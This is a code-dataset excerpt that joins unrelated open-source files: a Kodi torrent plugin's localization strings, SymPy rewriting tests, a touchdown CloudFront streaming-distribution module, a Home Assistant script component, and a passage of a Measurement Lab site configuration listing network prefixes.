'Ви завжди можете перезапустити, вилучивши бази через контекстне меню', 'Your preloaded databases are outdated!': 'Ваші завантажені бази мета-даних застаріли!', 'Do you want to download new ones right now?': 'Бажаєте завантажити нові прямо зараз?', 'Individual Tracker Options':'Вибір трекерів', 'Downloading and copy subtitles. Please wait.':'Завантаження та копіювання субтитрів. Будь ласка, зачекайте.', 'International Check - First Run':'Міжнародна перевірка - перший запуск', 'Delete Russian stuff?':'Вилучити російські трекери?', 'Save to path':'Зберегти в каталог', 'Return Russian stuff':'Повернути російські трекери', '%d files have been returned':'%d файлів повернуто', 'Download via T-client':'Завантажити торрент-клієнтом', 'Download via Libtorrent':'Завантажити Libtorrent\'ом', 'Download Status':'Статус завантаження', 'Download has not finished yet':'Завантаження не завершене', 'Stopped and Deleted!':'Зупинено та Вилучено!', 'Unpaused!':'Відновлено!', 'Paused!':'Призупинено!', 'Stopped!':'Зупинено!', 'Started!':'Запущено!', 'Delete and Stop':'Вилучити та зупинити', 'Unpause':'Відновити', 'Pause':'Пауза', 'Delete':'Видалити', 'Open (no return)':'Відкрити (без повернення)', 'Torrent is seeding. To stop it use Download Status.':'Сідування. Для зупинки використовуйте Статус завантаження.', 'Start All':'Запустити все', 'Started All!':'Все запущене!', 'Stopped All!':'Все зупинене!', 'Stop All':'Зупинити все', 'Keyboard':'Клавіатура', 'Copy Files in Root':'Зкопіювати файли в корінь', 'Copied %d files!':'Зкопійовано %d файлів!', 'Return to %s':'Повернутись в %s', 'Search results:':'Результати пошуку:', 'by Seeders':'по сідам', 'by Date':'по даті', 'Sort':'сортування', 'Close':'Закрити вікно', 'Views:':'Перегляди.:', 'Rating:':'Рейтинг:', 'Information not found!':'Інформація не знайдена!', 'Choose searcher':'Оберіть трекер', 'python-libtorrent Not Found':'python-libtorrent не знайдено', 'Windows has static compiled python-libtorrent included.':'На Windows при встановленні з репозиторію разом з плагіном йде python-libtorrent.', 'You should install "script.module.libtorrent" from "MyShows.me Kodi Repo"':'Встановіть "script.module.libtorrent" з "MyShows.me Kodi Repo"', 'Linux x64 has not static compiled python-libtorrent included.':'На Linux x64 не змогли зібрати статичну версію python-libtorrent', 'You should install it by "sudo apt-get install python-libtorrent"':'Встановіть командою "sudo apt-get install python-libtorrent"', 'Linux has static compiled python-libtorrent included but it didn\'t work.':'На Linux x86 є статична версія python-libtorrent, але вона не спрацювала.', 'As far as I know you can compile python-libtorrent for ARMv6-7.':'На ARMv6-7 можно скомпілювати python-libtorrent', 'You should search for "OneEvil\'s OpenELEC libtorrent" or use Ace Stream.':'Пошукайте "OneEvil\'s OpenELEC libtorrent" або використовуйте Ace Stream', 'Please use install Ace Stream APK and choose it in Settings.':'Встановіть Ace Stream APK і оберіть плеєр в Налаштуваннях', 'It is possible to compile python-libtorrent for Android, but I don\'t know how.':'Скомпілювати python-libtorrent на Android можливо, але ми не знаємо як.', 'It is possible to compile python-libtorrent for OS X.':'Скомпілювати python-libtorrent на OS X можливо.', 'But you would have to do it by yourself, there is some info on github.com.':'Але це доведеться робити самому, на гітхабі була інформація', 'It is NOT possible to compile python-libtorrent for iOS.':'Під iOS неможливо скомпілювати python-libtorrent', 'But you can use torrent-client control functions.':'Але всі решта функцій, крім прямого стрімінгу, працюють.', } } try: return dictionary[language][text] except: if language=='uk': try: return dictionary['ru'][text] except: return text else: return text
chimkentec/KodiMODo_rep
plugin.video.torrenter/Localization.py
Python
gpl-3.0
56,942
0.008658
# -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function) from sympy import log, exp, Symbol, Pow, sin from sympy.printing.ccode import ccode from sympy.codegen.cfunctions import log2, exp2, expm1, log1p from sympy.codegen.rewriting import ( optimize, log2_opt, exp2_opt, expm1_opt, log1p_opt, optims_c99, create_expand_pow_optimization ) from sympy.utilities.pytest import XFAIL def test_log2_opt(): x = Symbol('x') expr1 = 7*log(3*x + 5)/(log(2)) opt1 = optimize(expr1, [log2_opt]) assert opt1 == 7*log2(3*x + 5) assert opt1.rewrite(log) == expr1 expr2 = 3*log(5*x + 7)/(13*log(2)) opt2 = optimize(expr2, [log2_opt]) assert opt2 == 3*log2(5*x + 7)/13 assert opt2.rewrite(log) == expr2 expr3 = log(x)/log(2) opt3 = optimize(expr3, [log2_opt]) assert opt3 == log2(x) assert opt3.rewrite(log) == expr3 expr4 = log(x)/log(2) + log(x+1) opt4 = optimize(expr4, [log2_opt]) assert opt4 == log2(x) + log(2)*log2(x+1) assert opt4.rewrite(log) == expr4 expr5 = log(17) opt5 = optimize(expr5, [log2_opt]) assert opt5 == expr5 expr6 = log(x + 3)/log(2) opt6 = optimize(expr6, [log2_opt]) assert str(opt6) == 'log2(x + 3)' assert opt6.rewrite(log) == expr6 def test_exp2_opt(): x = Symbol('x') expr1 = 1 + 2**x opt1 = optimize(expr1, [exp2_opt]) assert opt1 == 1 + exp2(x) assert opt1.rewrite(Pow) == expr1 expr2 = 1 + 3**x assert expr2 == optimize(expr2, [exp2_opt]) def test_expm1_opt(): x = Symbol('x') expr1 = exp(x) - 1 opt1 = optimize(expr1, [expm1_opt]) assert expm1(x) - opt1 == 0 assert opt1.rewrite(exp) == expr1 expr2 = 3*exp(x) - 3 opt2 = optimize(expr2, [expm1_opt]) assert 3*expm1(x) == opt2 assert opt2.rewrite(exp) == expr2 expr3 = 3*exp(x) - 5 assert expr3 == optimize(expr3, [expm1_opt]) expr4 = 3*exp(x) + log(x) - 3 opt4 = optimize(expr4, [expm1_opt]) assert 3*expm1(x) + log(x) == opt4 assert opt4.rewrite(exp) == expr4 expr5 = 3*exp(2*x) - 3 opt5 = optimize(expr5, [expm1_opt]) assert 3*expm1(2*x) == opt5 assert opt5.rewrite(exp) == expr5 @XFAIL def test_expm1_two_exp_terms(): x, y = map(Symbol, 'x y'.split()) expr1 = exp(x) + exp(y) - 2 opt1 = optimize(expr1, [expm1_opt]) assert opt1 == expm1(x) + expm1(y) def test_log1p_opt(): x = Symbol('x') expr1 = log(x + 1) opt1 = optimize(expr1, [log1p_opt]) assert log1p(x) - opt1 == 0 assert opt1.rewrite(log) == expr1 expr2 = log(3*x + 3) opt2 = optimize(expr2, [log1p_opt]) assert log1p(x) + log(3) == opt2 assert (opt2.rewrite(log) - expr2).simplify() == 0 expr3 = log(2*x + 1) opt3 = optimize(expr3, [log1p_opt]) assert log1p(2*x) - opt3 == 0 assert opt3.rewrite(log) == expr3 expr4 = log(x+3) opt4 = optimize(expr4, [log1p_opt]) assert str(opt4) == 'log(x + 3)' def test_optims_c99(): x = Symbol('x') expr1 = 2**x + log(x)/log(2) + log(x + 1) + exp(x) - 1 opt1 = optimize(expr1, optims_c99).simplify() assert opt1 == exp2(x) + log2(x) + log1p(x) + expm1(x) assert opt1.rewrite(exp).rewrite(log).rewrite(Pow) == expr1 expr2 = log(x)/log(2) + log(x + 1) opt2 = optimize(expr2, optims_c99) assert opt2 == log2(x) + log1p(x) assert opt2.rewrite(log) == expr2 expr3 = log(x)/log(2) + log(17*x + 17) opt3 = optimize(expr3, optims_c99) delta3 = opt3 - (log2(x) + log(17) + log1p(x)) assert delta3 == 0 assert (opt3.rewrite(log) - expr3).simplify() == 0 expr4 = 2**x + 3*log(5*x + 7)/(13*log(2)) + 11*exp(x) - 11 + log(17*x + 17) opt4 = optimize(expr4, optims_c99).simplify() delta4 = opt4 - (exp2(x) + 3*log2(5*x + 7)/13 + 11*expm1(x) + log(17) + log1p(x)) assert delta4 == 0 assert (opt4.rewrite(exp).rewrite(log).rewrite(Pow) - expr4).simplify() == 0 expr5 = 3*exp(2*x) - 3 opt5 = optimize(expr5, optims_c99) delta5 = opt5 - 3*expm1(2*x) assert delta5 == 0 assert opt5.rewrite(exp) == expr5 expr6 = exp(2*x) - 3 opt6 = optimize(expr6, optims_c99) delta6 = opt6 - (exp(2*x) - 3) assert delta6 == 0 expr7 = log(3*x + 3) opt7 = optimize(expr7, optims_c99) delta7 = opt7 - (log(3) + log1p(x)) assert delta7 == 0 assert (opt7.rewrite(log) - expr7).simplify() == 0 expr8 = log(2*x + 3) opt8 = optimize(expr8, optims_c99) assert opt8 == expr8 def test_create_expand_pow_optimization(): my_opt = create_expand_pow_optimization(4) x = Symbol('x') assert ccode(optimize(x**4, [my_opt])) == 'x*x*x*x' x5x4 = x**5 + x**4 assert ccode(optimize(x5x4, [my_opt])) == 'pow(x, 5) + x*x*x*x' sin4x = sin(x)**4 assert ccode(optimize(sin4x, [my_opt])) == 'pow(sin(x), 4)'
wxgeo/geophar
wxgeometrie/sympy/codegen/tests/test_rewriting.py
Python
gpl-2.0
4,843
0.000413
# Copyright 2014-2015 Isotoma Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import uuid from touchdown.core.resource import Resource from touchdown.core.plan import Plan, Present from touchdown.core import argument, serializers from ..account import BaseAccount from ..common import SimpleDescribe, SimpleApply, SimpleDestroy, RefreshMetadata from ..s3 import Bucket from .. import route53 from .common import CloudFrontList class StreamingLoggingConfig(Resource): resource_name = "streaming_logging_config" dot_ignore = True enabled = argument.Boolean(field="Enabled", default=False) bucket = argument.Resource(Bucket, field="Bucket", serializer=serializers.Default(default=None), default="") prefix = argument.String(field="Prefix", default="") class StreamingDistribution(Resource): resource_name = "streaming_distribution" extra_serializers = { "CallerReference": serializers.Expression( lambda runner, object: runner.get_plan(object).object.get('StreamingDistributionConfig', {}).get('CallerReference', str(uuid.uuid4())) ), "Aliases": CloudFrontList(serializers.Chain( serializers.Context(serializers.Argument("cname"), serializers.ListOfOne(maybe_empty=True)), serializers.Context(serializers.Argument("aliases"), serializers.List()), )), "TrustedSigners": serializers.Const({ "Enabled": False, "Quantity": 0, }), "S3Origin": serializers.Resource(group="s3origin"), } name = argument.String() cname = argument.String(default=lambda instance: instance.name) comment = argument.String(field='Comment', default=lambda instance: instance.name) aliases = argument.List() enabled = argument.Boolean(default=True, field="Enabled") bucket = argument.Resource( Bucket, field="DomainName", serializer=serializers.Format("{0}.s3.amazonaws.com", serializers.Identifier()), group="s3origin" ) origin_access_identity = argument.String(default='', field="OriginAccessIdentity", group="s3origin") logging = argument.Resource( StreamingLoggingConfig, default=lambda instance: dict(enabled=False), field="Logging", serializer=serializers.Resource(), ) price_class = argument.String( default="PriceClass_100", choices=['PriceClass_100', 'PriceClass_200', 'PriceClass_All'], field="PriceClass", ) account = argument.Resource(BaseAccount) class Describe(SimpleDescribe, Plan): resource = StreamingDistribution service_name = 'cloudfront' describe_filters = {} describe_action = "list_streaming_distributions" describe_envelope = 'StreamingDistributionList.Items' key = 'Id' def get_describe_filters(self): return {"Id": self.object['Id']} def describe_object_matches(self, d): return self.resource.name == d['Comment'] or self.resource.name in d['Aliases'].get('Items', []) def describe_object(self): distribution = super(Describe, self).describe_object() if distribution: result = self.client.get_streaming_distribution(Id=distribution['Id']) distribution = {"ETag": result["ETag"], "Id": distribution["Id"]} distribution.update(result['StreamingDistribution']) return distribution class Apply(SimpleApply, Describe): create_action = "create_streaming_distribution" create_response = "not-that-useful" waiter = "streaming_distribution_deployed" signature = ( Present("name"), Present("bucket"), ) def get_create_serializer(self): return serializers.Dict( StreamingDistributionConfig=serializers.Resource(), ) class Destroy(SimpleDestroy, Describe): destroy_action = "delete_streaming_distribution" def get_destroy_serializer(self): return serializers.Dict( Id=self.resource_id, IfMatch=serializers.Property('ETag'), ) def destroy_object(self): if not self.object: return if self.object['StreamingDistributionConfig'].get('Enabled', False): yield self.generic_action( "Disable streaming distribution", self.client.update_streaming_distribution, Id=self.object['Id'], IfMatch=self.object['ETag'], StreamingDistributionConfig=serializers.Resource( Enabled=False, ), ) yield self.get_waiter( ["Waiting for streaming distribution to enter disabled state"], "streaming_distribution_deployed", ) yield RefreshMetadata(self) for change in super(Destroy, self).destroy_object(): yield change class AliasTarget(route53.AliasTarget): """ Adapts a StreamingDistribution into a AliasTarget """ input = StreamingDistribution def get_serializer(self, runner, **kwargs): return serializers.Context( serializers.Const(self.adapts), serializers.Dict( DNSName=serializers.Context( serializers.Property("DomainName"), serializers.Expression(lambda r, o: route53._normalize(o)), ), HostedZoneId="Z2FDTNDATAQYW2", EvaluateTargetHealth=False, ) )
mitchellrj/touchdown
touchdown/aws/cloudfront/streaming_distribution.py
Python
apache-2.0
6,002
0.001666
""" homeassistant.components.script ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scripts are a sequence of actions that can be triggered manually by the user or automatically based upon automation events, etc. """ import logging from datetime import timedelta import homeassistant.util.dt as date_util import threading from homeassistant.helpers.event import track_point_in_time from homeassistant.util import split_entity_id from homeassistant.const import ( STATE_ON, STATE_OFF, SERVICE_TURN_ON, SERVICE_TURN_OFF, EVENT_TIME_CHANGED) DOMAIN = "script" DEPENDENCIES = ["group"] CONF_ALIAS = "alias" CONF_SERVICE = "execute_service" CONF_SERVICE_DATA = "service_data" CONF_SEQUENCE = "sequence" CONF_DELAY = "delay" _LOGGER = logging.getLogger(__name__) def setup(hass, config): """ Load the scripts from the configuration. """ scripts = [] for name, cfg in config[DOMAIN].items(): if CONF_SEQUENCE not in cfg: _LOGGER.warn("Missing key 'sequence' for script %s", name) continue alias = cfg.get(CONF_ALIAS, name) entity_id = "{}.{}".format(DOMAIN, name) script = Script(hass, entity_id, alias, cfg[CONF_SEQUENCE]) hass.services.register(DOMAIN, name, script) scripts.append(script) def turn_on(service): """ Calls a script. """ for entity_id in service.data['entity_id']: domain, service = split_entity_id(entity_id) hass.services.call(domain, service, {}) def turn_off(service): """ Cancels a script. """ for entity_id in service.data['entity_id']: for script in scripts: if script.entity_id == entity_id: script.cancel() hass.services.register(DOMAIN, SERVICE_TURN_ON, turn_on) hass.services.register(DOMAIN, SERVICE_TURN_OFF, turn_off) return True class Script(object): # pylint: disable=attribute-defined-outside-init # pylint: disable=too-many-instance-attributes # pylint: disable=too-few-public-methods """ A script contains a sequence of service calls or configured delays that are executed in order. Each script also has a state (on/off) indicating whether the script is running or not. """ def __init__(self, hass, entity_id, alias, sequence): self.hass = hass self.alias = alias self.sequence = sequence self.entity_id = entity_id self._lock = threading.Lock() self._reset() def cancel(self): """ Cancels a running script and resets the state back to off. """ _LOGGER.info("Cancelled script %s", self.alias) with self._lock: if self.listener: self.hass.bus.remove_listener(EVENT_TIME_CHANGED, self.listener) self.listener = None self._reset() def _reset(self): """ Resets a script back to default state so that it is ready to run from the start again. """ self.actions = None self.listener = None self.last_action = "Not Running" self.hass.states.set(self.entity_id, STATE_OFF, { "friendly_name": self.alias, "last_action": self.last_action }) def _execute_until_done(self): """ Executes a sequence of actions until finished or until a delay is encountered. If a delay action is encountered, the script registers itself to be called again in the future, when _execute_until_done will resume. Returns True if finished, False otherwise. """ for action in self.actions: if CONF_SERVICE in action: self._call_service(action) elif CONF_DELAY in action: delay = timedelta(**action[CONF_DELAY]) point_in_time = date_util.now() + delay self.listener = track_point_in_time( self.hass, self, point_in_time) return False return True def __call__(self, *args, **kwargs): """ Executes the script. """ _LOGGER.info("Executing script %s", self.alias) with self._lock: if self.actions is None: self.actions = (action for action in self.sequence) if not self._execute_until_done(): state = self.hass.states.get(self.entity_id) state.attributes['last_action'] = self.last_action self.hass.states.set(self.entity_id, STATE_ON, state.attributes) else: self._reset() def _call_service(self, action): """ Calls the service specified in the action. """ self.last_action = action.get(CONF_ALIAS, action[CONF_SERVICE]) _LOGGER.info("Executing script %s step %s", self.alias, self.last_action) domain, service = split_entity_id(action[CONF_SERVICE]) data = action.get(CONF_SERVICE_DATA, {}) self.hass.services.call(domain, service, data)
michaelarnauts/home-assistant
homeassistant/components/script.py
Python
mit
5,105
0
#!/usr/bin/python from planetlab.model import * from users import user_list # NOTE: The legacy network remap is used to re-order the automatically # generated, sequential list of ipaddresses to a legacy order to preserve # pre-existing slice-and-IP assignments. Otherwise, slices would be assigned # to new IPs, and for now, we wish to preserve the slice-node-ip mapping. # An appropriate time to remove this and re-assign IPs to slices would be # after a major update & reinstallation, such as LXC kernel update. legacy_network_remap = {} Network.legacy_network_remap = legacy_network_remap # name : site prefix, used to generate PL site name, hostnames, etc # net : v4 & v6 network prefixes and definitions. # The "arch" parameter of makesite() is a facility that PLC uses to pass the # correct kernel arguments when booting nodes at a given site. Currently defined # "arch" values are: # # i386 - none # x86_64 - "noapic acpi=off" # x86_64-r420 - "pci=nobios acpi=off" # x86_64-r630 - none site_list = [ makesite('akl01','163.7.129.0', '2404:138:4009::', 'Auckland', 'NZ', -36.850000, 174.783000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams03','80.239.169.0', '2001:2030:32::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams04','77.67.114.64', '2001:668:1f:5f::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams05','195.89.145.0', '2001:5002:100:21::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams08','213.244.128.128','2001:4c08:2003:2::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn02','195.89.146.192', '2001:5012:100:24::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn03','213.242.86.64', '2001:4c08:2003:44::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn04','62.115.225.128', '2001:2030:0:38::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn05','77.67.119.64', '2001:668:1f:6a::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ath03','193.201.166.128', '2001:648:25e0::', 'Athens', 'GR', 37.936400, 23.944400, user_list, count=4, arch='x86_64-r630', v6gw='2001:648:25e0::129', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl02','38.112.151.64', '2001:550:5b00:1::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl03','64.86.200.192', '2001:5a0:3b02::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl04','173.205.0.192', '2001:668:1f:1c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl07','209.170.91.128', '2001:2030:0:42::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl08','4.71.254.128', '2001:1900:3001:c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bcn01','91.213.30.192', '2001:67c:137c:5::', 'Barcelona', 'ES', 41.297445, 2.081105, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('beg01','188.120.127.0', '2001:7f8:1e:6::', 'Belgrade', 'RS', 44.821600, 20.292100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bom01','125.18.112.64', '2404:a800:2000:217::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bom02','14.143.58.128', '2403:0:100:66::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru01','195.89.146.128', '2001:5005:200::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru02','212.3.248.192', '2001:4c08:2003:45::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru03','62.115.229.192', '2001:2030:0:39::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru04','77.67.119.0', '2001:668:1f:69::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('cpt01','154.114.19.64', '2001:4200:0:e::', 'Cape_Town', 'ZA', -33.972387,18.601803, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('den02','4.34.58.0', '2001:1900:2200:49::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('den04','128.177.109.64', '2001:438:fffd:2c::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('den05','209.170.120.64', '2001:2030:0:3b::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw02','64.86.132.64', '2001:5a0:3f00::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw03','4.15.35.128', '2001:1900:2200:44::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw05','128.177.163.64', '2001:438:fffd:30::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw07','209.170.119.128','2001:2030:0:1f::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw08','38.107.216.0', '2001:550:2000::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dub01','193.1.12.192', '2001:770:b5::', 'Dublin', 'IE', 53.433300, -6.250000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fln01','200.237.203.0', '2801:80:a88:4006::', 'Florianopolis', 'BR', -27.668455, -48.545998, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra01','80.239.199.0', '2001:2030:2f::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra02','77.67.114.0', '2001:668:1f:5e::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra03','195.89.146.64', '2001:5001:200:30::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('fra04','62.67.198.192', '2001:4c08:2003:40::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ham02','80.239.142.192', '2001:2030:0:19::', 'Hamburg', 'DE', 53.633300, 9.983330, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), # NOTE: hnd01's arch is 'x86_64-r630', but they are actually R620s. The boot flags and CD for the R630s works for the R620s, whereas the arch 'x86_64' does not. makesite('hnd01','203.178.130.192','2001:200:0:b801::', 'Tokyo', 'JP', 35.552200, 139.780000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('hnd02','210.151.179.128','2001:260:8a::', 'Tokyo', 'JP', 35.552200, 139.780000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad02','38.90.140.128', '2001:550:200:7::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad03','66.198.10.128', '2001:5a0:3c03::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad04','173.205.4.0', '2001:668:1f:21::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad05','4.35.238.192', '2001:1900:2200:46::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('iad06','209.170.119.192','2001:2030:0:29::', 'Washington_DC', 'US', 38.944400, -77.455800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('jnb01','196.24.45.128', '2001:4200:fff0:4512::','Johannesburg', 'ZA', -26.203500, 28.133500, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax02','63.243.240.64', '2001:5a0:3a01::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax03','173.205.3.64', '2001:668:1f:1e::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax04','4.15.166.0', '2001:1900:2100:15::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax05','128.177.109.192','2001:438:fffd:2e::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lax06','38.98.51.0', '2001:550:6800::', 'Los Angeles_CA', 'US', 33.942500, -118.407200, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga03','64.86.148.128', '2001:5a0:4300::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga04','173.205.4.64', '2001:668:1f:22::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga05','4.35.94.0', '2001:1900:2100:14::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga06','128.177.119.192','2001:438:fffd:2b::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga08','38.106.70.128', '2001:550:1d00:100::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr02','80.239.170.192', '2001:2030:33::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr03','77.67.114.192', '2001:668:1f:61::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr04','195.89.146.0', '2001:5000:1100:31::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lhr05','212.113.31.0', '2001:4c08:2003:3c::', 'London', 'GB', 51.469700, -0.451389, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lis01','213.242.96.192', '2001:4c08:2003:3d::', 'Lisbon', 'PT', 38.775600, -9.135400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lis02','195.89.147.128', '2001:500d:200:3::', 'Lisbon', 'PT', 38.775600, -9.135400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lju01','91.239.96.64', '2001:67c:27e4:100::', 'Ljubljana', 'SI', 46.223600, 14.457500, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mad02','213.242.96.128','2001:4c08:2003:3e::', 'Madrid', 'ES', 40.466700, -3.566670, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mad03','80.239.229.128','2001:2030:34::', 'Madrid', 'ES', 40.466700, -3.566670, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mad04','77.67.115.64', '2001:668:1f:63::', 'Madrid', 'ES', 40.466700, -3.566670, user_list, count=4, arch='x86_64-r630', 